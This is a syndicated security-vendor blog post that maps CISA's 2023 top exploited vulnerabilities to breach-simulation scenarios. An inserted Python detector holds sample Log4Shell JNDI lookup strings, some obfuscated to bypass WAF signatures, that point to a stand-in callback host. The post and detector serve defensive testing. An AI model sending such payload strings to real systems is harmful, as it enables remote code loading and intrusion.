Response to CISA Advisory (AA24-317A): 2023 Top Routinely Exploited Vulnerabilities
2024-11-14 02:52:41 Source: securityboulevard.com

On November 12, 2024, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) released a Cybersecurity Advisory (CSA) providing details on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2023 and their associated Common Weakness Enumerations (CWEs). According to the CSA, malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks in 2023 compared to 2022, allowing them to conduct operations against high priority targets.


This recent alert was part of a collaboration effort between CISA, the Federal Bureau of Investigation (FBI), the National Security Agency (NSA), the Australian Signals Directorate’s Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), the Computer Emergency Response Team New Zealand (CERT NZ), and the United Kingdom National Cyber Security Centre (NCSC-UK).

The recommendations that follow include a range of assessments for testing against many of the top routinely exploited vulnerabilities from 2023. While these recommendations focus on the vulnerabilities named in the CISA advisory, AttackIQ always encourages organizations to adopt the Assume Breach practice and to test real-world adversary post-compromise tactics, techniques, and procedures (TTPs).

1. Citrix (CVE-2023-4966):

AttackIQ has previously emulated behaviors associated with the exploitation of this vulnerability. It is recommended to run the following emulation:

  • Attack Graph: [CISA AA23-325A] #StopRansomware: LockBit 3.0 Ransomware Affiliates Exploit CVE 2023-4966 Citrix Bleed Vulnerability

2. MOVEit (CVE-2023-34362):

AttackIQ has previously emulated behaviors associated with the exploitation of this vulnerability. It is recommended to run the following emulations:

  • Attack Graph: [CISA AA23-158A] #StopRansomware: CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability
  • Scenario: PCAP Replay – MOVEit Transfer SQL Injection Vulnerability (CVE-2023-34362)
  • Scenario: PCAP Replay – LEMURLOOT WebShell Exploiting MOVEit Transfer Vulnerability (CVE-2023-34362)

3. Apache (CVE-2021-44228):

AttackIQ has previously emulated behaviors associated with exploitation of this vulnerability. It is recommended to run the following emulations:

  • Attack Graph: Log4Shell (CVE-2021-44228) – 2021-12-14 – Post-Compromise Example Attack Graph
  • Scenario: Log4Shell (CVE-2021-44228) Signature-Based Web Request
  • Scenario: Log4Shell (CVE-2021-44228) Signature-Based Web Request – VMWare Horizon
  • Scenario: Log4Shell (CVE-2021-44228) Signature-Based Web Requests (multiple payloads)
  • Scenario: PCAP Replay – Log4Shell exploit (CVE-2021-44228)
  • Scenario: PCAP Replay – Exfiltrate AWS credentials over DNS using Log4Shell (CVE-2021-44228)
  • Scenario: WAF Test (Log4Shell Vulnerability (CVE-2021-44228)): Exploit via DNS Protocol
  • Scenario: WAF Test (Log4Shell Vulnerability (CVE-2021-44228)): Exploit via DNS Protocol (Exfiltrate AWS Credentials)
  • Scenario: WAF Test (Log4Shell Vulnerability (CVE-2021-44228)): Exploit via LDAP Protocol
  • Scenario: WAF Test (Log4Shell Vulnerability (CVE-2021-44228)): Exploit via LDAPS Protocol
  • Scenario: WAF Test (Log4Shell Vulnerability (CVE-2021-44228)): Exploit via WAF Bypass Technique (::- notation)
  • Scenario: WAF Test (Log4Shell Vulnerability (CVE-2021-44228)): Exploit via WAF Bypass Technique (Lower Lookup)
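The WAF bypass scenarios above (the `::-` default-value notation and the `lower` lookup) work because Log4j resolves nested lookups before the outer `${jndi:...}` string is ever seen by a signature. The following detector, an added example that is not AttackIQ's code or one of its scenarios, collapses those inner lookups first and then looks for a JNDI lookup in constructed web-server log lines; the log lines, host names and the `normalize_lookup`/`scan_line` names are assumptions for illustration.

```python
import re

# Constructed sample access-log lines (not from the original post); the
# User-Agent field carries the lookup string in the three positive cases.
SAMPLE_LOGS = [
    '10.0.0.5 - - [14/Nov/2024:02:52:41 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [14/Nov/2024:02:53:01 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://callback.example/a}"',
    '10.0.0.7 - - [14/Nov/2024:02:53:10 +0000] "GET /login HTTP/1.1" 200 88 "-" "${${lower:j}ndi:ldaps://callback.example/a}"',
    '10.0.0.8 - - [14/Nov/2024:02:53:15 +0000] "GET /login HTTP/1.1" 200 88 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://callback.example/a}"',
    '10.0.0.9 - - [14/Nov/2024:02:53:20 +0000] "GET /search?q=${env:HOME} HTTP/1.1" 200 88 "-" "curl/8.0"',
]

# Innermost lookups that Log4j resolves to a literal before the outer lookup runs:
#   ${lower:X} -> x      ${upper:x} -> X      ${anything:-x} (incl. ${::-x}) -> x
_LOWER = re.compile(r'\$\{lower:([^${}]*)\}', re.IGNORECASE)
_UPPER = re.compile(r'\$\{upper:([^${}]*)\}', re.IGNORECASE)
_DEFAULT = re.compile(r'\$\{[^${}]*?:-([^${}]*)\}')

# Protocols the JNDI lookup can dispatch to; host is captured for triage.
_JNDI = re.compile(r'\$\{\s*jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba)://([^/}\s]+)', re.IGNORECASE)


def normalize_lookup(s, max_rounds=10):
    """Repeatedly collapse innermost obfuscating lookups until nothing changes."""
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), s)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s


def scan_line(line):
    """Return (protocol, host) if the line carries a JNDI lookup after normalization, else None."""
    m = _JNDI.search(normalize_lookup(line))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan_logs(lines):
    """Return [(index, (protocol, host)), ...] for every line that matches."""
    hits = []
    for i, line in enumerate(lines):
        hit = scan_line(line)
        if hit:
            hits.append((i, hit))
    return hits


if __name__ == "__main__":
    for idx, (proto, host) in scan_logs(SAMPLE_LOGS):
        print(f"line {idx}: JNDI lookup via {proto} to {host}")
```

A plain signature on `${jndi:` would only catch the second sample line; the normalization step is what makes the `lower` and `::-` variants visible.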

4. Zoho (CVE-2022-47966, CVE-2021-40539):

AttackIQ has previously emulated post-compromise behaviors associated with the successful exploitation of CVE-2022-47966.

  • Attack Graph: [CISA AA23-250A] Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475

AttackIQ has previously emulated post-compromise behaviors associated with the successful exploitation of CVE-2021-40539.

  • Attack Graph: [CISA AA23-284A] #StopRansomware: AvosLocker Ransomware

5. PaperCut (CVE-2023-27350):

AttackIQ has previously emulated post-compromise behaviors associated with the successful exploitation of this vulnerability. Additionally, LockBit ransomware was observed being used by the Bl00dy Ransomware Gang, for which AttackIQ released a full-featured attack graph.

  • Scenario: PaperCut MF/NG SetupCompleted Authentication Bypass Web Request (CVE-2023-27350)
  • Scenario: PCAP Replay – PaperCut MF/NG SetupCompleted Authentication Bypass (CVE-2023-27350) & PCAP Replay – PaperCut MF/NG Remote Code Execution (CVE-2023-27350)
  • Scenario: PCAP Replay – PaperCut MF/NG SetupCompleted Authentication Bypass (CVE-2023-27350)

6. Microsoft (CVE-2020-1472, CVE-2021-34473):

AttackIQ has existing scenarios to test the Microsoft ZeroLogon and ProxyShell vulnerabilities.

  • Scenario: Zerologon Attack with Mimikatz
  • Scenario: ProxyShell Exploit (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)

7. Progress Telerik (CVE-2019-18935):

AttackIQ has previously emulated post-compromise behaviors associated with the successful exploitation of this vulnerability.

  • Attack Graph: [CISA AA23-074A] Multiple Actors Exploit Telerik Vulnerability to Deploy Webshells and Backdoors

8. Red Hat (CVE-2021-4034):

AttackIQ has the following scenario to test this vulnerability.

  • Scenario: Pwnkit Local Privilege Escalation

9. Atlassian (CVE-2022-26134):

AttackIQ has the following scenario to test this vulnerability.

  • Scenario: PCAP Replay – Confluence Remote Code Execution (CVE-2022-26134)

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by these threats, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends reviewing CISA’s recommendations and focusing on the techniques emulated in our previously released assessment template.

1. Review CISA’s Patching and Detection Recommendations:

CISA has provided a considerable number of recommendations on the best ways to defend against these and similar attacks. AttackIQ strongly recommends reviewing the detection and mitigation recommendations and adapting them to your environment first, to determine whether you have already been affected, before reviewing the assessment results.

Wrap-up

In summary, the recommendations as described in this post are a good starting point for evaluating the effectiveness of your security personnel, processes and controls against these and similar threats. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against commonly used vulnerabilities.

AttackIQ offers a comprehensive Breach and Attack Simulation Platform to assist security teams. This includes AttackIQ Flex, a tailored pay-as-you-go service; AttackIQ Ready!, a fully managed service for continuous security optimization; and AttackIQ Enterprise, a co-managed service offering enhanced support. These services ensure your team maintains a robust security posture.


*** This is a Security Bloggers Network syndicated blog from AttackIQ authored by Francis Guibernau. Read the original post at: https://www.attackiq.com/2024/11/13/response-to-cisa-advisory-aa24-317a/


Source: https://securityboulevard.com/2024/11/response-to-cisa-advisory-aa24-317a-2023-top-routinely-exploited-vulnerabilities/